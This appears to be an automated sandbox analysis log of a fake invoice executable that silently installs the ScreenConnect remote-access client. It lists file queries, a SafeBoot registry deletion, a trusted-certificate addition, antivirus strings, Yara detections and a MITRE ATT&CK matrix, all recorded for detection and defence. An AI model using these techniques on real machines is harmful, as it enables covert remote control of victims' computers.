Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsBackstageShell.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsFileManager.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsFileManager.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Code function: 0_2_00EF1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00EF1806

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Deletes keys which are related to windows safe boot (disables safe mode boot)

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (89e470af-f42d-4b2f-ad1d-717711c7c76a)

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Adds / modifies Windows certificates

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Remote Access Functionality

Yara detected ScreenConnect Tool

Source: Yara match	File source: 9.0.ScreenConnect.WindowsClient.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2591740664.000001F6B5E76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1933881909.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 5812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7736, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	121 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Inhibit System Recovery
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Obfuscated Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Windows Service	2 Windows Service	1 Install Root Certificate	Security Account Manager	34 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	12 Process Injection	1 Timestomp	NTDS	51 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
